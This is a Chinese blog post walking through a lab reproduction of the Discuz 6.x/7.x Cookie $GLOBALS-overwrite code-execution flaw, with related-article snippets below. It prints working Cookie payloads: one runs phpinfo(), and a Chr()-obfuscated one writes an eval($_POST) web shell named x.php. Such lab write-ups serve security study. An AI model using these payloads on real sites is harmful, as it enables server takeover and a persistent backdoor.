vulfocus——discuz命令执行(wooyun-2010-080723)

最新推荐文章于 2023-05-16 16:26:23 发布
最新推荐文章于 2023-05-16 16:26:23 发布
阅读量1.3k 收藏
点赞数
分类专栏: vulfocus复现 文章标签: html 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62063669/article/details/126867344
版权

描述

 由于php5.3.x版本里php.ini的设置里request_order默认值为GP, 导致$_REQUEST中不再包含$_COOKIE, 我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。

如PHP中的system、exec、shell_exec、passthru、popen、proc_popen等,当用户能控制这些函数中的参数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞。

复现

1.打开web页面

2.找到一个帖子,然后用burp suite抓包

 

3.将Cookie内的内容修改为:

GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();

4.发现以上命令执行成功,进行写入shell的操作:

GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=eval(Chr(102).Chr(112).Chr(117).Chr(116).Chr(115).Chr(40).Chr(102).Chr(111).Chr(112).Chr(101).Chr(110).Chr(40).Chr(39).Chr(120).Chr(46).Chr(112).Chr(104).Chr(112).Chr(39).Chr(44).Chr(39).Chr(119).Chr(39).Chr(41).Chr(44).Chr(39).Chr(60).Chr(63).Chr(112).Chr(104).Chr(112).Chr(32).Chr(64).Chr(101).Chr(118).Chr(97).Chr(108).Chr(40).Chr(36).Chr(95).Chr(80).Chr(79).Chr(83).Chr(84).Chr(91).Chr(112).Chr(119).Chr(100).Chr(93).Chr(41).Chr(63).Chr(62).Chr(39).Chr(41).Chr(59))

5.访问一下x.php文件

6.在上述代码中,文件为:x.php   密码为: pwd

隐身的菜鸟
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Discuz 7.x/6.x 全局变量防御绕过导致代码执行
haha1314的博客
07-15 981
Discuz 7.x/6.x 全局变量防御绕过导致代码执行 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致$_REQUEST中不再包含$_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。 漏洞复现 安装成功后,直接找一个已存在的帖子,向其发送数据包,并在Cookie中增加GLOBALS[_DCACHE][sm...
入门漏洞——命令执行漏洞、目录浏览漏洞
栉风沐雪的博客
01-29 1741
目录浏览漏洞属于目录遍历漏洞的一种,由于网站存在配置缺陷,存在目录可浏览漏洞,这会导致网站很多隐私文件与目录泄露,比如数据库备份文件、配置文件等,攻击者利用该信息可以更容易得到网站权限,该漏洞可能由于开发者没有配置正确的默认首页文件,导致整个目录结构被罗列出来,暴露网站结构。命令执行(Command Execution)漏洞即可以直接在Web应用中执行系统命令,从而获取敏感信息或者拿下shell权限,服务器没有对执行命令进行过滤。用户可以随意执行系统命令,属于高危漏洞。可以执行cmd后的命令
vulhub】Discuz-命令执行 wooyun-2010-080723
weixin_42884199的博客
12-06 1764
一、启动靶机 docker-compose build docker-compose up -d 二、安装 URL: http://192.168.150.146:8080/install 安装数据库。数据库服务器填写db(必须db,不然安装失败),数据库名为discuz,数据库账号密码均为root,管理员密码任意。填写联系方式页面直接点击跳过本步后跳转到首页,登录成功后进入默认板块,开启Burp抓包,然后随便点击一篇贴子 将Cookie修改为下面,点击放包 三、构造payload 请求: GET
【漏洞复现-discuz-wooyun-命令执行vulfocus/discuz-wooyun_2010_080723
10-14 1167
discuz-wooyun-命令执行】Cookie中命令执行
Discuz 数据库操作方法
多年以后,我们在哪里。。
04-08 2910
函数 功能 DB::table($tablename) 获取正确带前缀的表名,转换数据库句柄DB::delete($tablename, 条件,条数限制) 删除表中的数据DB::insert($tablename, 数据(数组),是否返回插入ID,是否是替换式,是否silent) 插入数据操作DB::update($tablename, 数据(数组)条件) 更新操作DB::fe
Vulhub靶场Discuz-命令执行(wooyun-2010-080723)漏洞复现
X_python321的博客
05-16 334
Discuz-命令执行(wooyun-2010-080723)漏洞复现
py爬虫wooyun-public-master
04-20
### py爬虫wooyun-public-master #### 知识点一:Py爬虫与Wooyun_public-master的关系 - **Py爬虫**:通常指的是使用Python语言编写的网络爬虫程序。这类程序能够自动地抓取互联网上的数据,并进行处理和分析。 - ...
python爬虫案例wooyun-public-master.zip
最新发布
05-31
在"python爬虫案例wooyun-public-master.zip"中,我们可以深入探讨Python爬虫技术的相关知识点,包括基础概念、常用库、网络请求、HTML解析、数据存储等方面。 1. **基础概念** - **爬虫**: 一种自动浏览并提取...
wooyun-public-master-python.rar
01-23
wooyun_public-master-python.rar Python爬虫入门需要掌握Python基础语法、网络请求和数据抓取、解析HTML和XML、处理HTTP响应、数据存储、使用代理和反爬策略、并发和多线程等技术,并遵守相关法律和道德规范。
wooyun_public-master.zip
08-23
标题中的"wooyun_public-master.zip"表明这是一个与Wooyun相关的开源项目,而Wooyun,也称为“乌云”,曾是中国知名的网络安全社区。这个压缩包可能是该社区公开的一部分资源或者研究资料,以"master"命名,通常代表...
wooyun_public-master-python.rar
02-03
【标题】"wooyun_public-master-python.rar" 是一个压缩包文件,主要包含与Python相关的源码和学习资源。从标题来看,我们可以推测这可能是一个关于网络安全或漏洞挖掘的项目,因为“wooyun”(乌云)曾是一个知名的...
Discuz 7.x6.x 全局变量防御绕过导致代码执行wooyun-2010-080723
黑白的博客
12-06 536
声明 好好学习,天天向上 漏洞描述 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致REQUEST中不再包含_REQUEST中不再包含R​EQUEST中不再包含_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。 影响范围 6.x 7.x 复现过程 使用vulhub 这里使用7.2版本 cd /app/vulhub-master/discuz/wooyun-2010-080723 启动 docker-compose
buuctf [Discuz]wooyun-2010-080723
qq_1873822的博客
03-23 1555
漏洞描述 由于php5.3.x版本里php.ini的设置里request_order默认值为GP, 导致$_REQUEST中不再包含$_COOKIE, 我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。 https://www.secpulse.com/archives/2338.html https://www.freebuf.com/articles/web/226207.html 漏洞复现 http://node3.buuoj.cn:28226/install/来安装di
discuz wooyun-2010-080723
weixin_37639863的博客
02-17 1843
漏洞复现-Discuz-命令执行wooyun-2010-080723) - 铺哩 - 博客园0x00 实验环境 攻击机:win10 靶机:Ubuntu18 (docker搭建的vulhub靶场) 0x01 影响版本 Discuz 7.x 6.x版本 0x02 实验目的 学习discuz的部分https://www.cnblogs.com/cute-puli/p/13333991.htmlbuuctf [Discuz]wooyun-2010-080723_Fatesec的博客-CSDN博客漏洞描述由于php
DiscuzX系列命令执行分析公开(三连弹)
weixin_34242331的博客
03-08 606
tang3 · 2015/01/15 18:550x00 漏洞概要昨天360补天发了这样的一条微博:然后打听了一下细节,发现居然是我13年7月报给TSRC的漏洞,看今天大家玩的挺开心,与TSRC的人聊了两句,说这个系列可以发几个了,所以我也来凑个热闹,把原来的分析发出来给大家看一下(这里做个广告,TSRC提交Discuz的漏洞,奖品棒棒哒~~)。这个漏洞原来我是作为前台命令执行发个TSRC的,虽然...
Discuz远程代码执行(CVE-2019-13956)
qq_51459600的博客
05-04 1843
Discuz! ML远程代码执行(CVE-2019-13956) 漏洞介绍: 该漏洞存在discuz ml(多国语言版)中,cookie中的language可控并且没有严格过滤,导致可以远程代码执行。 环境搭建: 靶机:CentOS7(10.10.10.137) docker环境下载: https://codeload.github.com/rhbb/CVE-2019-13956/zip/refs/heads/master 进入目录: docker-compuse up -d docker ps -a
Discuz! 后台数据库备份功能命令执行漏洞
weixin_34402408的博客
10-11 678
简介:2018年8月27号,有安全研究人员在GitHub上公布了有关Discuz!多个版本中后台数据库备份功能存在的命令执行漏洞的细节。修复方案:目前官方对于老版本Discuz不再更新,如需要手动修复此漏洞,较可靠的做法是将Discuz升级到Discuz3.4或以上版本。【注意:该补丁为云盾自研代码修复方案,云盾会根据您当前代码是否符合云盾自研的修复模式进行检测,如果您自行采...
Vulfocus复现Spring框架远程命令执行漏洞(CNVD-2022-23942)
Aquarius_ego的博客
05-16 1655
Vulfocus复现Spring框架远程命令执行漏洞(CNVD-2022-23942)/spring-core-rce-2022-03-29
vulfocus复现:Spring Framework 远程命令执行漏洞
woai_zhongguo的博客
07-18 1059
vulfocus复现:Spring Framework 远程命令执行漏洞
wooyun-2010-09336
01-14
wooyun-2010-09336是2010年发生的一起网络安全漏洞事件。这个漏洞是由于某个网站的后台管理系统存在缺陷,使得攻击者可以绕过身份验证,远程执行恶意代码,从而获取系统的控制权。 当时,一位白帽黑客通过对该网站...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值